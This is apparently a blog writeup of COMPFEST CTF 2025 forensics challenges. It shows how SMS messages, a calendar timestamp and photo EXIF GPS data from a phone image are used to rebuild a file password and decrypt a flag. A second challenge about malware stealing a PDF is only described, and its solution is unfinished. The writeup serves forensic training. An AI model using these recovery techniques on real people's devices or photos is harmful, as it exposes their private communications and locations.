Zip password : 2a07b93ef0362ba7286d536ac1e16c17

Solution

In the SQLite Files section, by sorting by modification date in descending order, we can see that only two files were modified in 2025: bugle_db.db on 2025-08-20, and calendar.db on 2025-08-12.

COMPFEST17-2

The bugle_db.db file stores the phone’s SMS messages. Let’s examine it for any useful information.

COMPFEST17-3

In the message_text table, the following conversation was found:

Hey, did you finish documenting the warehouse issues?
Yes, I have all the photos and safety violation reports ready
Perfect. The board meeting is next week, we need to be ready
I know. Dad's going to be furious but people could get seriously hurt
The chemical storage violations alone could kill someone
I uploaded everything to our secure drive
Which one? We have multiple backup locations
We upload our work here: https://drive.google.com/drive/folders/1wfF_RRAp_dyzDzHeNJhe4CvZNs9qbwUK?usp=sharing
Great! What's the access code again?
It's encrypted with the date of our first date-location, like 23122025-londonbridge
Got it! The evidence package is solid. All papers, financial docs, everything. I'm pretty shocked to hear that you remember our anniversary.
Yeah, I always keep a reminder of important dates and events on my phone. Anyways, I know this is hard with your family situation, but we're doing the right thing
Agreed. I'll submit to the regulatory board next week
Thanks for having my back on this. The safety violations are too serious to ignore
Always. We have to protect the workers, even if it costs us our jobs
The photos from the scanner app should be the final piece we need
Perfect. See you at our usual spot later to go over the timeline?
Yes. Same time as our anniversary dinner reservation 😉
How was work today sweetie?
Busy as usual. Lots of documentation work
Don't work too hard! Remember family dinner Sunday
Wouldn't miss it mom ❤️
Thanks for dinner last night! Love you ❤️
Poker night this Friday?
Can't this week, working on a big project
Everything OK? You've been busy lately
Just some important stuff at work. Rain check?
Game night tomorrow at 8?
Safety inspection results are in
When can we discuss them?
Let's schedule something private
Agreed. Too many ears in the office
Meeting moved to 2 PM
Want to grab lunch today?
Can't today, buried in paperwork
You've been stressed lately. Everything OK?
Just work stuff. Nothing I can't handle
Coffee later?
The quarterly reports are due next week
I'm working on the safety compliance section
Make sure everything is thoroughly documented
Project update needed ASAP
Hey go and watch this https://youtu.be/eVpKuSGM_-E?si=SJn01Vi5Aw-bQJPm
What's that
Something important
Package delivery attempted
I wasn't expecting anything
Your package has been delivered
John, we need to discuss the safety audit results
Of course. When would be convenient?
Tomorrow morning, 8 AM sharp. Don't be late
I'll be there sir
And John... keep this between us for now

A Google Drive link is mentioned in the conversation: https://drive.google.com/drive/folders/1wfF_RRAp_dyzDzHeNJhe4CvZNs9qbwUK?usp=sharing

COMPFEST17-4

Inside this Google Drive folder, an encrypted file named classified.pdf.gpg was found.

From the conversation, we can also gather the following information:

The couple is not having an affair; they are actually whistleblowers. They are secretly collecting evidence of serious safety violations in the company’s warehouse and plan to submit it to the regulatory board next week to protect the workers. The man’s father is a high-ranking executive in the company, which adds significant pressure and risk to their investigation, explaining their need for secrecy.

"Great! What's the access code again?" "It's encrypted with the date of our first date-location, like 23122025-londonbridge" This exchange reveals the password format for the file in Google Drive: DDMMYYYY-locationname. The location format is all lowercase with no spaces (e.g., londonbridge). The next step is to find the date and location of their first date.

"I'm pretty shocked to hear that you remember our anniversary." "Yeah, I always keep a reminder of important dates and events on my phone." These two lines imply that the date of their first date is recorded on the phone. Following this lead, we'll now examine calendar.db.

In record #16 of the Event table, we find an "Anniversary" event with the description We started dating, and took a picture to commemorate it. The dtstart timestamp is 1583193600000 (epoch milliseconds), and the eventTimezone is America/New_York. 1583193600000 ms is exactly 2020-03-03 00:00:00 UTC, i.e. March 3, 2020. Note that rendering the same instant in the event's own America/New_York zone would land on the evening of March 2; the UTC calendar date is the one the challenge expects. This provides the first part of the password: 03032020.

COMPFEST17-5

Following the clue from the record, “took a picture to commemorate it,” we now look for the photo. By filtering the images for a modification date between March 2, 2020, and March 4, 2020, we find a single image:

COMPFEST17-6

Below is its EXIF information:

...
Software : Our first date
Modify Date : 2020:03:03 14:30:00
Date/Time Original : 2020:03:03 14:30:00
Create Date : 2020:03:03 14:30:00
...
GPS Latitude : 40 deg 47' 6.32" N
GPS Longitude : 73 deg 58' 5.82" W
GPS Position : 40 deg 47' 6.32" N, 73 deg 58' 5.82" W

Next, searching for 40°47'06.3"N 73°58'05.8"W on Google Maps reveals that the photo was taken in Central Park:

COMPFEST17-7

Therefore, the second part of the password is centralpark. Combining both parts, the full password is 03032020-centralpark.
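The two artefacts that feed the password, the epoch-millisecond dtstart and the degrees/minutes/seconds GPS coordinates from EXIF, are both easy to convert by hand and both easy to get subtly wrong (timezone, hemisphere sign). The following is an added example, not part of the writeup: it converts the values quoted above, shows the off-by-a-day result you get if the timestamp is rendered in New York time, turns the DMS coordinates into decimal degrees for a map lookup, and assembles the password in the DDMMYYYY-location format from the SMS. The fixed UTC-5 offset stands in for America/New_York on that date (DST began on 8 March 2020) so the example needs no tz database; that offset is an assumption of the example.

```python
from datetime import datetime, timedelta, timezone

# Added example (not the writeup's code). Inputs are the values quoted on the page;
# the EST offset is an assumption used so the example needs no tz database.

DTSTART_MS = 1583193600000                            # calendar.db Event.dtstart of record #16
NEW_YORK_EARLY_MARCH = timezone(timedelta(hours=-5))  # America/New_York before DST on 8 March 2020
LAT_DMS = (40, 47, 6.32, "N")                         # GPS Latitude from the photo's EXIF
LON_DMS = (73, 58, 5.82, "W")                         # GPS Longitude from the photo's EXIF


def event_datetime(dtstart_ms: int, tz=timezone.utc) -> datetime:
    """Android calendar dtstart values are epoch milliseconds; interpret in the given zone."""
    return datetime.fromtimestamp(dtstart_ms / 1000, tz=tz)


def ddmmyyyy(d: datetime) -> str:
    return d.strftime("%d%m%Y")


def dms_to_decimal(degrees: int, minutes: int, seconds: float, hemisphere: str) -> float:
    """EXIF stores GPS as degrees/minutes/seconds plus an N/S or E/W reference;
    south and west are negative in decimal degrees."""
    value = degrees + minutes / 60 + seconds / 3600
    if hemisphere in ("S", "W"):
        value = -value
    return round(value, 6)


def normalise_location(name: str) -> str:
    """Format from the SMS ('londonbridge'): lowercase, no spaces."""
    return "".join(name.lower().split())


def build_password(dtstart_ms: int, location: str, tz=timezone.utc) -> str:
    return f"{ddmmyyyy(event_datetime(dtstart_ms, tz))}-{normalise_location(location)}"


if __name__ == "__main__":
    print(event_datetime(DTSTART_MS).isoformat())                        # midnight UTC, 3 March 2020
    print(event_datetime(DTSTART_MS, NEW_YORK_EARLY_MARCH).isoformat())  # evening of 2 March in New York
    print(dms_to_decimal(*LAT_DMS), dms_to_decimal(*LON_DMS))            # paste into a map search
    print(build_password(DTSTART_MS, "Central Park"))
```

If the first password attempt fails, the timezone-shifted date (02032020-centralpark here) is the next candidate to try before assuming the location is wrong.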

Next, we use the password 03032020-centralpark to decrypt the classified.pdf.gpg file:

┌──(kali㉿kali)-[~/Desktop]
└─$ gpg --decrypt classified.pdf.gpg > classified.pdf

The flag is found in the decrypted classified.pdf file.

COMPFEST17-8

FLAG

1
COMPFEST17{p4rtners_wh0_w0rk_t0gether_t00_w3ll_5b3c71c672} 

Update Required

Challenge

A researcher in Mondstadt’s tech division received an urgent-looking HTML file, claiming to be a critical security patch. Trusting its source, they executed antivirus.exe and moments later, a secret PDF file disappeared.

The PDF contained a confidential override PIN tied to the Vision Distribution Network. To protect it, the researcher locked the PDF with their wallet’s seed phrase (exported from a Chrome extension), joined with an underscore (_) as the password.

Although the wallet vault file remains on disk, the password to unlock it has since been lost. Fortunately, there’s a lead: the researcher once copied the vault password to clipboard.

Chall: https://drive.google.com/drive/folders/1R1psX7e04W1aJXFHK_WbNkRt5ukFXOlc?usp=sharing

Zip password : soalinigasusahkokxixixixi

Solution

TBD

FLAG

TBD

  • Title: COMPFEST CTF 2025
  • Author: Aristore
  • Created: 2025-10-05 17:45:00
  • Updated: 2025-10-05 17:46:42
  • Link: https://www.aristore.top/posts/COMPFEST17/
  • Copyright: © Aristore. Reproduction prohibited.